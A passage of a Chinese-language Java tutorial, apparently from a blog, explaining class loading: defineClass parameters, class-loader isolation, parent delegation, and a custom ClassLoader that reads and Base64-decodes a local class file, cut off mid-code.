<span class="line"><span>    }</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><blockquote><ol><li><code>String name</code>： 这是类的全限定名。在类加载器的作用下，该类将会被加载到Java虚拟机中。</li><li><code>byte[] b</code>： 这是一个字节数组，包含了一个类的字节码。这个字节数组通常是通过读取一个类文件（以 .class 结尾的文件）获得的。字节码数组应该包含有效的Java类文件的内容。</li><li><code>int off</code>：这是字节数组 <code>b</code> 中的起始偏移量，表示开始转换的位置。</li><li><code>int len</code>： 这是要转换的字节数，表示从偏移量 <code>off</code> 处开始的连续字节的长度。</li></ol></blockquote><h1 id="java类加载隔离" tabindex="-1"><a class="header-anchor" href="#java类加载隔离"><span>Java类加载隔离</span></a></h1><p>创建类加载器的时候可以指定该类加载的父类加载器，ClassLoader是有隔离机制的，不同的ClassLoader可以加载相同的Class（两者必须是非继承关系）。 假设我们有两个应用程序 App1 和 App2，它们都使用了一个名为 MyClass 的类。我们来看看如何使用不同的类加载器来隔离这两个应用程序:</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>// App1.java</span></span>
<span class="line"><span>public class App1 {</span></span>
<span class="line"><span>    public static void main(String[] args) {</span></span>
<span class="line"><span>        MyClass obj = new MyClass();</span></span>
<span class="line"><span>        obj.doSomething();</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// App2.java</span></span>
<span class="line"><span>public class App2 {</span></span>
<span class="line"><span>    public static void main(String[] args) {</span></span>
<span class="line"><span>        MyClass obj = new MyClass();</span></span>
<span class="line"><span>        obj.doSomething();</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// MyClass.java</span></span>
<span class="line"><span>public class MyClass {</span></span>
<span class="line"><span>    public void doSomething() {</span></span>
<span class="line"><span>        System.out.println(&quot;MyClass doing something...&quot;);</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><p>如果我们使用同一个类加载器加载这两个应用程序,那么它们将共享同一个 MyClass 实例,如果其中一个应用程序修改了 MyClass，另一个应用程序也会受到影响。</p><p>为了隔离这两个应用程序,我们可以使用不同的类加载器来加载它们:</p><div class="language- line-numbers-mode" data-highlighter="shiki" data-ext="" data-title="" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span>// App1Loader.java</span></span>
<span class="line"><span>public class App1Loader extends ClassLoader {</span></span>
<span class="line"><span>    @Override</span></span>
<span class="line"><span>    protected Class&lt;?&gt; findClass(String name) throws ClassNotFoundException {</span></span>
<span class="line"><span>        if (name.equals(&quot;MyClass&quot;)) {</span></span>
<span class="line"><span>            byte[] classBytes = loadClassBytes(&quot;MyClass&quot;);</span></span>
<span class="line"><span>            return defineClass(name, classBytes, 0, classBytes.length);</span></span>
<span class="line"><span>        }</span></span>
<span class="line"><span>        return super.findClass(name);</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    private byte[] loadClassBytes(String name) {</span></span>
<span class="line"><span>        // 从文件或其他地方加载 MyClass 的字节码</span></span>
<span class="line"><span>        // ...</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// App2Loader.java</span></span>
<span class="line"><span>public class App2Loader extends ClassLoader {</span></span>
<span class="line"><span>    @Override</span></span>
<span class="line"><span>    protected Class&lt;?&gt; findClass(String name) throws ClassNotFoundException {</span></span>
<span class="line"><span>        if (name.equals(&quot;MyClass&quot;)) {</span></span>
<span class="line"><span>            byte[] classBytes = loadClassBytes(&quot;MyClass&quot;);</span></span>
<span class="line"><span>            return defineClass(name, classBytes, 0, classBytes.length);</span></span>
<span class="line"><span>        }</span></span>
<span class="line"><span>        return super.findClass(name);</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span></span></span>
<span class="line"><span>    private byte[] loadClassBytes(String name) {</span></span>
<span class="line"><span>        // 从文件或其他地方加载 MyClass 的字节码</span></span>
<span class="line"><span>        // ...</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// App1.java</span></span>
<span class="line"><span>public class App1 {</span></span>
<span class="line"><span>    public static void main(String[] args) {</span></span>
<span class="line"><span>        ClassLoader loader = new App1Loader();</span></span>
<span class="line"><span>        Class&lt;?&gt; clazz = loader.loadClass(&quot;MyClass&quot;);</span></span>
<span class="line"><span>        Object obj = clazz.newInstance();</span></span>
<span class="line"><span>        // 调用 MyClass 的方法</span></span>
<span class="line"><span>    }</span></span>
<span class="line"><span>}</span></span>
<span class="line"><span></span></span>
<span class="line"><span>// App2.java</span></span>
<span class="line"><span>public class App2 {</span></span>
<span class="line"><span>    public static void main(String[] args) {</span></span>
<span class="line"><span>        ClassLoader loader = new App2Loader();</span></span>
<span class="line"><span>        Class&lt;?&gt; clazz = loader.loadClass(&quot;MyClass&quot;);</span></span>
<span class="line"><span>        Object obj = clazz.newInstance();</span></span>
<span class="line"><span>        // 调用 MyClass 的方法</span></span>
<span class="line"><span>    }</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><h2 id="双亲委派机制" tabindex="-1"><a class="header-anchor" href="#双亲委派机制"><span>双亲委派机制</span></a></h2><p>简单来说就是类加载器接到加载类的请求时，首先会先将任务委托给父类加载器，接着请求父类加载这个类，当父类加载器无法加载时（其目录搜素范围没有找到所需要的类时），子类加载器才会进行加载使用。</p><figure><img src="https://img2023.cnblogs.com/blog/3290837/202311/3290837-20231110215026626-519718966.png#id=M7XkT&amp;originHeight=773&amp;originWidth=671&amp;originalType=binary&amp;ratio=1&amp;rotation=0&amp;showTitle=false&amp;status=done&amp;style=none&amp;title=" alt="" tabindex="0" loading="lazy"><figcaption></figcaption></figure><p>我们可以看到我们自定义的类是在最下面的,所以我们是无法更改java内部的三个加载器所负责的类.</p><p>因为第一个进行加载动作的其实是最顶层的引导类加载器，那么引导类加载器去寻找的目录的java类优先级就是最高的。即使有同名的java类，也不会影响java系统运行。</p><h2 id="类加载方式" tabindex="-1"><a class="header-anchor" href="#类加载方式"><span>类加载方式</span></a></h2><ol><li>命令行启动应用时候由JVM初始化加载</li><li>通过Class.forName()方法动态加载</li><li>通过ClassLoader.loadClass()方法动态加载</li></ol><p>他们的区别是</p><ul><li>Class.forName(): 将类的.class文件加载到jvm中之外，还会对类进行解释，执行类中的static块；</li><li>ClassLoader.loadClass(): 只干一件事情，就是将.class文件加载到jvm中，不会执行static中的内容,只有在newInstance才会去执行static块。</li><li>Class.forName(name, initialize, loader)带参函数也可控制是否加载static块。并且只有调用了newInstance()方法采用调用构造函数，创建类的对象.</li></ul><div class="language-java line-numbers-mode" data-highlighter="shiki" data-ext="java" data-title="java" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">public</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> class</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> loaderTest</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">    public</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> static</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> void</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> main</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">String</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">[] </span><span style="--shiki-light:#383A42;--shiki-light-font-style:inherit;--shiki-dark:#E06C75;--shiki-dark-font-style:italic;">args</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">)</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> throws</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> ClassNotFoundException</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">        ClassLoader</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> loader</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> loaderTest</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">class</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">getClassLoader</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">        System</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">out</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">println</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(loader);</span></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">        //使用ClassLoader.loadClass()来加载类，不会执行初始化块</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">        System</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">out</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">println</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;使用ClassLoader.loadClass()</span><span style="--shiki-light:#0184BC;--shiki-dark:#56B6C2;">\n</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">--------------&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">        loader</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">loadClass</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;Test2&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">        //使用Class.forName()来加载类，默认会执行初始化块</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">        System</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">out</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">println</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;使用Class.forName()</span><span style="--shiki-light:#0184BC;--shiki-dark:#56B6C2;">\n</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">--------------&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">        Class</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">forName</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;Test2&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">        //使用Class.forName()来加载类，并指定ClassLoader，初始化时不执行静态块</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">        System</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">out</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">println</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;使用Class.forName()</span><span style="--shiki-light:#0184BC;--shiki-dark:#56B6C2;">\n</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">--------------&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">        Class</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">forName</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;Test2&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">, </span><span style="--shiki-light:#986801;--shiki-dark:#D19A66;">false</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">, loader);</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">    }</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">}</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div><h2 id="自定义加载器" tabindex="-1"><a class="header-anchor" href="#自定义加载器"><span>自定义加载器</span></a></h2><p>主要就是继承ClassLoader类,我们自己的一个逻辑书写在findClass方法中</p><div class="language-java line-numbers-mode" data-highlighter="shiki" data-ext="java" data-title="java" style="--shiki-light:#383A42;--shiki-dark:#abb2bf;--shiki-light-bg:#FAFAFA;--shiki-dark-bg:#282c34;"><pre class="shiki shiki-themes one-light one-dark-pro vp-code"><code><span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">public</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> class</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> ClassLoaderStudy</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> extends</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> ClassLoader</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">    private</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> static</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> final</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> String</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> testClassName </span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;">=</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;"> &quot;Test2&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">;</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">    @</span><span style="--shiki-light:#A626A4;--shiki-dark:#E5C07B;">Override</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">    protected</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> Class</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">&lt;</span><span style="--shiki-light:#C18401;--shiki-dark:#C678DD;">?</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">&gt;</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> findClass</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">String</span><span style="--shiki-light:#383A42;--shiki-light-font-style:inherit;--shiki-dark:#E06C75;--shiki-dark-font-style:italic;"> name</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">)</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> throws</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> ClassNotFoundException</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#C678DD;">        byte</span><span style="--shiki-light:#E45649;--shiki-dark:#ABB2BF;">[] </span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;">data</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;">=</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">loadClassData</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(name);</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">            if</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> (data </span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;">!=</span><span style="--shiki-light:#986801;--shiki-dark:#D19A66;"> null</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">) {</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">                return</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> defineClass</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(testClassName, data, </span><span style="--shiki-light:#986801;--shiki-dark:#D19A66;">0</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">, </span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">data</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">length</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">            }</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">        return</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> super</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">findClass</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(name);</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">    }</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">    private</span><span style="--shiki-light:#C18401;--shiki-dark:#C678DD;"> byte</span><span style="--shiki-light:#383A42;--shiki-dark:#61AFEF;">[] </span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">loadClassData</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">String</span><span style="--shiki-light:#383A42;--shiki-light-font-style:inherit;--shiki-dark:#E06C75;--shiki-dark-font-style:italic;"> className</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">)</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">        String</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> fileName</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> File</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">separatorChar</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;">                +</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> className</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">replace</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&#39;.&#39;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">, </span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">File</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">separatorChar</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">) </span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;">+</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;"> &quot;.class&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">;</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">        try</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">            System</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">out</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">println</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(fileName);</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">            InputStream</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> ins</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> new</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> FileInputStream</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(fileName);</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">            ByteArrayOutputStream</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> baos</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> new</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> ByteArrayOutputStream</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">            int</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> bufferSize</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#986801;--shiki-dark:#D19A66;"> 1024</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">;</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#C678DD;">            byte</span><span style="--shiki-light:#E45649;--shiki-dark:#ABB2BF;">[] </span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;">buffer</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> new</span><span style="--shiki-light:#C18401;--shiki-dark:#C678DD;"> byte</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">[bufferSize];</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">            int</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> length</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#986801;--shiki-dark:#D19A66;"> 0</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">;</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">            while</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> ((length </span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;">=</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> ins</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">read</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(buffer)) </span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;">!=</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> -</span><span style="--shiki-light:#986801;--shiki-dark:#D19A66;">1</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">) {</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">                baos</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">write</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(buffer, </span><span style="--shiki-light:#986801;--shiki-dark:#D19A66;">0</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">, length);</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">            }</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#C678DD;">            byte</span><span style="--shiki-light:#E45649;--shiki-dark:#ABB2BF;">[] </span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;">byteArray</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> baos</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">toByteArray</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">            Base64</span><span style="--shiki-light:#E45649;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">Decoder</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> base64Decoder</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> Base64</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">getDecoder</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">            // 对字节数组进行Base64解码</span></span>
